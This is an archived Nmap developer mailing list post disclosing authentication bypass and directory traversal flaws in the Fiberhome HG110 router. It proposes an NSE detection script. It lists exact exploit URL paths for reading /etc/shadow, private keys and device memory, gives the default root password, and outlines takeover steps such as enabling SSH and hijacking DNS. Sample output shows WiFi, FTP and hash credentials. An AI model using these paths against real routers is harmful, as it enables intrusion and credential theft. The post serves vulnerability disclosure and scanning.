Nmap Development mailing list archives
[NSE] Vulnerabilities in Fibrehome HG110
From: Tom Sellers <nmap () fadedcode net>
Date: Mon, 08 Jul 2013 06:44:24 -0500
On April 8th, 2011 Zerial ( fernando () zerial org ) published[1] details of local file inclusion and directory traversal vulnerabilities in the Fibrehome HG110 wireless gateway. The documentation below expands upon his findings and provides a technical writeup of the impacts and vectors of these vulnerabilities. The attached script serves to provide concrete results from the vulnerabilities described. Summary: Authentication bypass and complete remote compromise via HTTPS management interface in the default configuration of the FiberHome residential wireless gateway. Certain Central and South American subsidiaries of Telefonica distributed a customized version of the Fiberhome HG 110 wireless DSL gateway. The base device appears to be an often re-branded linux based ZTE router. Analysis of both the Telefonica device, and those that it appears to have been derived from, indicates that authentication and session management controls were broken during the customization process. This appears to be intentional as the new authenticationless interface directly references files that would normally be protected. The result is that the HG 110 router suffers from a vulnerability that permits unauthenticated REMOTE access to configuration and status pages on the management interface. In addition to exposing information about the device and clients, this access permits the router to be configured without additional controls. The result is that the device can be remotely and completely compromised permitting information disclosure, attack against client devices, and denial of service. It was not tested but current information indicates that the ability to install malware and packet sniffing tools on the device is likely. Further, the initial reconnaissance and reconfiguration traffic would occur over SSL which would prevent monitoring the nature of the activities. The only indicator of concern would be anomalous traffic from public IP addresses. If this traffic is kept to a minimum it would likely blend into the background noise of the Internet. Known affected versions are HG110_BH_V1.6 and HG110_BH_V1.9. The access vectors are on tcp ports 443 (SSL) and 8000 (HTTP). Examples of abuse of this vulnerability include: - Enabling remote SSH, TELNET, FTP and other services. As the root password appears to be 'root' on this and similar models this change alone completely compromises this device. The insecure direct object reference vulnerability can be combined with the local file inclusion vulnerability to access the password hashes in the /etc/shadow file. This permits validating that the password has not been changed from 'root' prior to enabling SSH. Cracking the hash is not required as all unmodified devices will have the same hash - '$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.' Once the credentials are verified the attacker could enable SSH and remotely access the device as root. Enabling SSH can be accomplished with a single, unauthenticated HTTP POST request. Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services - Forwarding of external ports to internal clients allowing direct attack of NAT/PAT'ed client devices. Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=portforwd - Hijacking client traffic by changing DNS configuration to point to malicious DNS servers. Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=dns - Compromise of all configuration details, including SSID and password/key, of the wireless network. Path: /cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=null Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlsecurity - Disclosure of IP address, MAC address, connectivity type, status and sometimes hostnames of devices PAT/NAT'ed behind the router. Information about devices connected in the past, but without current leases can also be captured. Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients Path: /cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=null Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=dhcpclients Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=wlclients Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=lan - Compromise of Internet/PPP username Path: /cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=null Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wancfg - Compromise of existing FTP server credentials and the ability to create new FTP accounts. Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ftpd_count_manager - Enable the ability to re-locate a target router by configuring it to register with a dynamic DNS provider Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=ddns - Denial of service of remote hosts by way of SNMP amplification attack after enabling SNMP and permitting outside access. Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=nwtools&var:subpage=snmp Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=services - Denial of service via reconfiguring many of the options and/or credentials - Disclosure of device information, hardware, software and firmware versions, etc Path: /cgi-bin/webproc?getpage=html/index.html&var:menu=status&var:page=deviceinfo - Access to usernames and password hashes: Path: /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null Path: /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null - Access to the SSL certificate private key. This key is reused on many models of devices. The thumbprint is 562e 7f2f 7b3d 5913 a6ca 64f2 5854 d131 e56c 4ff7 Issuer CN = localhost.localdomain, OU = ODC, O = Multitech, L = Bangalore, S = Karnataka, C = IN Path: /cgi-bin/webproc?getpage=../../../etc/mini_httpd.pem&var:menu=advanced&var:page=null - Access to dump a portion of the device's memory. This sometimes contains configuration data, log contents, and user traffic. Path: /cgi-bin/webproc?getpage=../../../dev/mem&var:menu=advanced&var:page=null - Access to configuration information stored by the device Path: /cgi-bin/webproc?getpage=../../../usr/www/html/config/config.xml&var:menu=advanced&var:page=null - Access to device hardware and state information Path: /cgi-bin/webproc?getpage=../../../proc/version&var:menu=advanced&var:page=null /proc/version Path: /cgi-bin/webproc?getpage=../../../proc/cpuinfo&var:menu=advanced&var:page=null /proc/cpuinfo Path: /cgi-bin/webproc?getpage=../../../proc/net/arp&var:menu=advanced&var:page=null /proc/net/arp In addition to illustrating some of the issues listed above, the attached script also captures the web login password hashes that are present in the sign on page's HTML. These hashes are compared to publicly known support passwords which are indicated when found. The following is output from the attached NSE script that illustrates the access and information gained using these vulnerabilities. 443/tcp open https syn-ack | vuln-fiberhome-hg-router: | Device: | Manufacturer: FIBERHOME | Serial Number: a3c31648f14f | Hardware Ver: HG110_BH_R1A | Software Ver: HG110_BH_V1.9 | Firmware Ver: 1.0.0 | Kernel: Linux version 2.6.19 | LAN Interface: 192.168.1.1( b8:c7:10:18:c3:1a ) | Time: 2000-01-02T18:31:11 | LAN: | Network: 192.168.1.1 / 255.255.255.0 | DHCP: | Pool: 192.168.1.50 - 192.168.1.100 | Active: True | WiFi: | SSID: Serg_WiFI2 | Security: WPA | Password: log1n21 | Channel: 0(AUTO) | Active: True | Internet: | Status: up | Speed: Down: 6,3Mb Up: 309Kb | Type: DSL | User: 0010001290112@domain | Password: | Branding: | Branding: o2 | Link: http://movistar.es | Country: CH | Default Language: es | Web Credential Hashes: | User Hash | Administrador $1$TW$4/4tmV7BKHXCDn5keBLUT1 | user $1$TW$dMolyCCNuy2WxyLJ.zUWv0 ( password is Need4$MVS.cl ) | support $1$TW$yS.Dzi9LPS3wn0qUQMBEA1 ( password is support ) | | FTP Credentials: | User Password | ftpuser S3cr3t | | /etc/passwd: | #root:x:0:0:root:/root:/bin/bash | root:x:0:0:root:/root:/bin/sh | #tw:x:504:504::/home/tw:/bin/bash | #tw:x:504:504::/home/tw:/bin/msh | /etc/shadow: | #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: | root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7::: ( password is root ) | #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: | #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7::: | DHCP Clients: | IP Address MAC Address Name | 192.168.1.33 00:1b:b9:e1:21:af sergio-PC | 192.168.1.36 74:a7:22:2a:77:4f android_ccaaa72b455fcc52 | | Device History: | IP Address MAC Address Connection Type Status | 192.168.1.16 D8:5D:4C:6F:89:E0 Ethernet disconnected | 192.168.1.33 00:1b:b9:e1:21:af Ethernet disconnected | 192.168.1.34 f4:0b:93:f0:0f:a1 WiFi disconnected | 192.168.1.35 fc:0f:e6:09:14:22 Ethernet connected | 192.168.1.34 00:22:15:27:85:9d disconnected | 169.254.235.110)00:1B:B9:A5:71:A 00:1B:B9:A5:71:A disconnected | 192.168.1.36 74:a7:22:2a:77:4f WiFi disconnected | 186.172.129.206)74:A7:22:24:98:1 74:A7:22:24:98:1 disconnected | 192.168.1.35 00:26:6c:ef:f3:95 Ethernet disconnected | 192.168.1.35 e0:ca:94:bd:06:c5 WiFi disconnected | 192.168.1.36 78:e4:00:b6:35:1a WiFi disconnected | 192.168.1.37 bc:b1:f3:25:53:e3 WiFi disconnected | 169.254.202.102)78:E4:00:B6:35:2 78:E4:00:B6:35:2 disconnected | 192.168.1.34 58:c3:8b:5c:1b:3a WiFi disconnected |_ 192.168.1.34 00:1A:73:93:82:4B WiFi disconnected References: 1. Local file inclusion publicly released in April 2011 by Zerial ( fernando () zerial.org) http://osvdb.org/show/osvdb/71827 http://seclists.org/fulldisclosure/2011/Apr/132 http://seclists.org/fulldisclosure/2011/Apr/153 http://blog.zerial.org/seguridad/vulnerabilidad-en-todos-los-routers-fiberhome-hg-110-de-telefonicamovistar/ If the attached script is suitable for inclusion I will rename and commit it. Tom Sellers
Attachment:
vuln-fiberhome-hg-router.nse
Description:
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- [NSE] Vulnerabilities in Fibrehome HG110 Tom Sellers (Jul 08)
- Re: [NSE] Vulnerabilities in Fibrehome HG110 David Fifield (Jul 31)